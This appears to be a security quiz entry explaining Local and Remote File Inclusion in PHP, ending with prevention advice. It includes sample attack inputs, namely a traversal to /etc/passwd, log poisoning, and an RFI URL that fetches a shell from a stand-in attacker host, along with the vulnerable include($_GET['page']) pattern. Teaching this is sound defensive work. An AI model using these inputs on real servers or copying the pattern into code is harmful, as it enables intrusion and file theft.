Quiz Entry - updated: 2026.07.05
What is Local/Remote File Inclusion and how does it enable code execution?
When user input picks which file the server includes/executes: LFI pulls in a file already on the server (e.g. a poisoned log), RFI pulls one from the attacker's server — both can reach code execution.
* LFI includes a file already on the server (traversal to /etc/passwd, or a poisoned log that then runs); RFI makes the server fetch and run the attacker's remote file — instant code execution. *
File Inclusion vulnerabilities occur when user input controls which file is loaded by server-side code.
Local File Inclusion (LFI):
- Attacker references files already on the server
?page=../../../etc/passwd→ reads system password file?page=../logs/access.log→ if log contains injected PHP, it executes
Remote File Inclusion (RFI):
- Attacker includes file from external server
?page=http://evil.com/shell→ server fetches and executes attacker's code- Instant remote code execution
Root cause: Code like include($_GET['page'] . '.php') trusts user input.
Prevention:
- Whitelist allowed files - never use raw user input for includes
- Disable
allow_url_includein PHP config - Use
basename()to strip path traversal (../) - Better: Use routing - don't dynamically include based on user input
Go deeper:
File inclusion vulnerability (Wikipedia) — LFI vs RFI, path traversal, and the PHP settings that enable remote inclusion.